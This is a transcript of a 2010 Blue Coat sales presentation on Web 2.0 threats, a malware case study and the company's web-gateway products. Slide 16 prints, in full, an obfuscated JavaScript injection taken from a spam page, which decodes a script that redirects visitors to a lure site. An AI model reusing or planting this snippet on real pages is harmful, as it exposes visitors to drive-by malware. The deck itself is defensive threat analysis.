Presentation is loading. Please wait.

Presentation is loading. Please wait.

Blue Coat and the Blue Coat logo are trademarks of Blue Coat Systems, Inc., and may be registered in certain jurisdictions. All other product or service.

Similar presentations


Presentation on theme: "Blue Coat and the Blue Coat logo are trademarks of Blue Coat Systems, Inc., and may be registered in certain jurisdictions. All other product or service."— Presentation transcript:

1 Blue Coat and the Blue Coat logo are trademarks of Blue Coat Systems, Inc., and may be registered in certain jurisdictions. All other product or service names are the property of their respective owners. © Blue Coat Systems, Inc. 2010. All Rights Reserved. Living in a Web 2.0 World (and how BCSI can help!) Mark Stanford SE Manager 20110 Ashbrook Place, Suite 275 Ashburn, VA 20147 (703) 857-2100 www.geobridge.net

2 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Agenda Definition of Web 2.0 Overview Real World Web 2.0 application and threat examples BCSI countermeasures: Layered Security Defenses

3 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Applications & Services Technologies & Programming Languages Software & Systems What is Web 2.0?

4 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Web Evolution 4 Interactive Pages Community Model Multi-Host Pages Static Pages Dynamic Pages Publishing Model Single Host Pages Nice to HaveMust Have Dynamic Pages

5 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Cyber Crime Evolution 5 Invisible Data Collection/Identity Profit Driven Wide-spread, Fast Visible, DoS Damage/Defacement Ingenuity/Pride Driven AmateursProfessionals Targeted

6 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Web 2.0 Did NOT change… the OSI model the way IP addresses work the way URLs are handled the way Web Filtering works DID change… how information gets posted, even legitimate sites how information may be presented By 2012 the Internet will be 75X larger than in 2002 What is required to find/identify threats on the web 6

7 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Web 2.0 Also Means 1 URL Leads to Many 12 Domains, 130 URLs (www.cnn.com, 31.03.2010, 10:12 a.m. German Time)www.cnn.com 12 Domains, 246 URLs (www.bild.de, 31.03.2010, 10:17 a.m. German Time)www.bild.de 7

8 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Web 2.0 and Search Engines 8 www Search Engine View Forums Blogs Wikis Guestbooks

9 © Blue Coat Systems, Inc. 2010. All Rights Reserved. 9

10 10 Malware Case Study

11 © Blue Coat Systems, Inc. 2010. All Rights Reserved. WebPulse saw a new referrer… 11 WebPulse

12 © Blue Coat Systems, Inc. 2010. All Rights Reserved. 12

13 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Nothing here… 13 Install Keys Satellite body { font-family: verdana; margin: 10px 100px; } Install Keys Satellite install clear xbox controller install remove lexus power window audio install honda civic 2007 ex install linux suse on new computer install electronic diary install cs3 in vista install warehouse shelving hp deskjet 5550 install software valve relief chevy piston install install patrol air filter no install lock folders how to install mailbox garage door have vb setup install jmail axle install hellwig ghetto install s forum apron front sink install tiger wood install install cobra fatty freeway bars plasma install adaptec tape install remote install software cnps 9500 install install modular plug rj45 can't install program how to install neon tubes how to install themes for mac 2003 install microsoft office msdos install system software install through active directory install vcr to dish network nero startsmart install error blat install syntax dell workstation 360n install cpu install setup install tunnel protectors project 2007 how to install self install fire pit install grub dual boot deluxe install prizm pro how to install a window shutter install laminate over existing counter top linksys 54g install

14 © Blue Coat Systems, Inc. 2010. All Rights Reserved. So… How did the User get there? 14

15 © Blue Coat Systems, Inc. 2010. All Rights Reserved. 15

16 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Interesting… 16 Install Keys Satellite document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%6 1%76%61%73%63%72%69%70%74%22%3E%0D%0A%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29 %7B%0D%0A%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74 %72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27 %3B%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2 B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%3 1%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E %6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%0D%0A%64%6F%63%75%6D%65%6E%74%2E%77%7 2%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%0D%0A%7D%0D%0A%3C%2F%73%6 3%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/mpdbujpo%264E%2633iuuq%264B00tubcjmjuzjofutdbo/dp n0ijujo/qiq%264Gmboe%264E31%2637bggje%264E27%3A11%2633%264C%264D0tdsjqu%264F1'); body { font-family: verdana; margin: 10px 100px; } Install Keys Satellite install clear xbox controller install remove lexus power window audio install honda civic 2007 ex install linux suse on new computer install electronic diary install cs3 in vista install warehouse shelving hp deskjet 5550 install software valve relief chevy piston install install patrol air filter no install lock folders how to install mailbox garage door { "@context": "http://schema.org", "@type": "ImageObject", "contentUrl": "http://images.slideplayer.com/5/1591114/slides/slide_16.jpg", "name": "© Blue Coat Systems, Inc. 2010. All Rights Reserved.", "description": "Interesting… 16 Install Keys Satellite document.write(unescape( %3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%6 1%76%61%73%63%72%69%70%74%22%3E%0D%0A%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29 %7B%0D%0A%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74 %72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27 %3B%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2 B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%3 1%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E %6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%0D%0A%64%6F%63%75%6D%65%6E%74%2E%77%7 2%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%0D%0A%7D%0D%0A%3C%2F%73%6 3%72%69%70%74%3E ));dF( %264Dtdsjqu%264Fepdvnfou/mpdbujpo%264E%2633iuuq%264B00tubcjmjuzjofutdbo/dp n0ijujo/qiq%264Gmboe%264E31%2637bggje%264E27%3A11%2633%264C%264D0tdsjqu%264F1 ); body { font-family: verdana; margin: 10px 100px; } Install Keys Satellite install clear xbox controller install remove lexus power window audio install honda civic 2007 ex install linux suse on new computer install electronic diary install cs3 in vista install warehouse shelving hp deskjet 5550 install software valve relief chevy piston install install patrol air filter no install lock folders how to install mailbox garage door

17 © Blue Coat Systems, Inc. 2010. All Rights Reserved. A friendly piece of advice… 17

18 © Blue Coat Systems, Inc. 2010. All Rights Reserved. You are in trouble… 18

19 © Blue Coat Systems, Inc. 2010. All Rights Reserved. This is very serious 19

20 © Blue Coat Systems, Inc. 2010. All Rights Reserved. 20

21 © Blue Coat Systems, Inc. 2010. All Rights Reserved. 21

22 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Web 2.0 Examples - Twitter Still a toy or already a tool?

23 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Web 2.0 Examples - Mashups

24 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Web 2.0 Examples - Facebook Still a toy or already a tool?

25 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Koobface worm (January 2009) Invitation to click on a link in Facebook or Myspace in- box Supposedly link to a funny video Users where told that they have to update their flash player to view the video The installed SW was a proxy server Now selected traffic could be redirected to the attacker A second program to download and install arbitrary code was installed, too Like magic, the infected computer is now a zombie, under the control of unknown villains

26 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Changing Web Habits 26 Top 10 Categories – 2009 WebFilter/WebPulse, 62M+ Users 1. Social Networking 2. Web Advertisements 3. Search Engines/Portals 4. Personals/Dating 5. Pornography 6. Computers/Internet 7. Audio/Video Clips 8. Adult/Mature Content 9. Web Email 10. Illegal/Questionable Top 10 Categories – 2009 WebFilter/WebPulse, 62M+ Users 1. Social Networking 2. Web Advertisements 3. Search Engines/Portals 4. Personals/Dating 5. Pornography 6. Computers/Internet 7. Audio/Video Clips 8. Adult/Mature Content 9. Web Email 10. Illegal/Questionable Social Networking Moved to #1 from #2 position Represents 25% of Top10 requests Web Email Dropped to #9 from #5 position Users migrating to social networking Cyber Crime Leverages Search engine poisoning Fake AV and Codec updates Popular site injections Death, Drama & Disaster lures Health & Wealth scams

27 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Layered Security Defenses

28 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Layered Defenses Cloud Service WebPulse & WebFilter Inline Threat Detection ProxyAV Web Application & Content Controls ProxySG Integrated Data Loss Prevention ProxySG with 6 DLP partners Remote Users ProxyClient 28

29 © Blue Coat Systems, Inc. 2010. All Rights Reserved. 29 Hybrid Design Architected to Deliver On-Demand Security Intelligence WAN Industrys leading collaborative cloud defense with 62M users Real-time inputs of any new web content and dynamic links Web protection, visibility, and reporting in any location ProxySG & ProxyAV WebFilter WebPulse ProxyClient Remote Users Web Gateway Protection Inline threat analysis w/SSL Web filtering & content controls Media optimization + B/W Mgmt Cloud Defenses Real-time web content ratings Web threat & malware detection Reputation ratings URL Filtering & Reporting Cloud threat protection Reporter Web

30 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Secure Web Gateway 30 Malware Scanning Protocol Compliance Content Filters Data Types Active Content URL Filtering AAA Policy Certificate Validation Method Controls BCWF WebPulse Reporter Log Files Object Cache Bandwidth Management Protocol Optimization ProxyAV: - Behavior based analysis - Signatures

31 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Preserve Productivity BCWF Malware Identification Strategy Dynamic Link Analysis A.Popular Web Site Pointers B.Middle Relay Servers & Link Farms C.Malware Download Hosts 31 A B C

32 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Dynamic Link Analysis Cloud connected community that is broad and diverse Real-time input of new web links to the cloud service Immediate analysis of URL chain for threats & rating Update master database in cloud to protect all members 32 Cloud Community

33 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Dynamic Link Analysis Cloud connected community that is broad and diverse Real-time input of new web links to the cloud service Immediate analysis of URL for threats & rating Update master database in cloud to protect all members 33 Cloud Community

34 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Dynamic Link Analysis Cloud connected community that is broad and diverse Real-time input of new web links to the cloud service Immediate analysis of URL for threats & rating Update master database in cloud to protect all members 34 Cloud Community

35 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Dynamic Link Analysis Cloud connected community that is broad and diverse Real-time input of new web links to the cloud service Immediate analysis of URL for threats & rating Update master database in cloud to protect all members 35 Cloud Community

36 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Dynamic Link Analysis Cloud connected community that is broad and diverse Real-time input of new web links to the cloud service Immediate analysis of full link chain for threats & rating Update master database in cloud to protect all members 36 Protects Web Gateways Remote Users Cloud Community

37 © Blue Coat Systems, Inc. 2010. All Rights Reserved. WebPulse: First Complete DLA solution New defense layer Full Dynamic link analysis Foundation for next generation URL filtering Fast, Aware, Protective… for anyone, anywhere 37 Protects Web Gateways Remote Users Cloud Community WebPulse 62M Users WebFilter 2B reqs/week ProxySG ProxyClient K9

38 © Blue Coat Systems, Inc. 2010. All Rights Reserved. K-9 Web Protect ProxyClient ProxySG ProxyAV BCWF Full List 16 Sources Signatures Behavior Heuristics Reputation Sandboxing Threat Analysis Deep Background Rating Analysis (DBRA) 2 Secs – 2hrs RTT Balanced URL Malware Uncategorized sent to WebPulse for Dynamic categorization 62M+ User Community 45B+ requests/week Fully Configurable and Secure 5 Min for security updates Rating Servers 300M Unique requests daily 1.2B requests rated weekly 50 languages Fast (ms) – try it! Real Time Boundary WebPulse Clients WebPulse Cloud Service Dynamic URL Cache Dynamic URL Cache Dynamic URL Cache URL & Content Trainers ANZ Master Rating Database VA CA HK UK

39 © Blue Coat Systems, Inc. 2010. All Rights Reserved. ProxyAV: Co-Processor Architecture Improved utilization with M:N ratio Higher throughput per gateway Results in less hardware (with new AV HW: always 1 SG – 1 AV sizing possible) Optimized design 39 Enterprise Network Internet ProxySG ProxyAV Clean Object Cache Finger Print Cache Dual Cache Design Patience Page Trickle First Trickle Last Defer Scan (media) ICAP, ICAP+, S-ICAP

40 © Blue Coat Systems, Inc. 2010. All Rights Reserved. ProxyAV – anti-malware features Dont get confused by the name AV Anti-malware features are more comprehensive then traditional pattern matching technologies Behavioral analysis Sandboxing Heuristics True file type detection Etc. ProxyAV vs. competitors: Aurora exploit (CVE-2010-0249) Note: Finjan was not able to block the exploit without a security update It is a different approach and philosophy

41 © Blue Coat Systems, Inc. 2010. All Rights Reserved. ProxyClient included with WebFilter Remote Filtering Cloud Connected Threat Protection Acceleration Central Policy Reporting 41

42 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Why Blue Coat Products? Unmatched policy controls & authentication options Proactive Malware/MMC detection Real-time web content analysis/DLA for gateway & client URL database, threat detection, and DLP partners Custom object-based OS with patented cache technologies Broad proxy library & acceleration techniques Bandwidth management & protocol optimization/compliance Experience, Reliability, Performance 42 All the RIGHT parts! Blue Coat Confidential Information

43 © Blue Coat Systems, Inc. 2010. All Rights Reserved. 43 Questions?

44 © Blue Coat Systems, Inc. 2010. All Rights Reserved.


Download ppt "Blue Coat and the Blue Coat logo are trademarks of Blue Coat Systems, Inc., and may be registered in certain jurisdictions. All other product or service."

Similar presentations


Ads by Google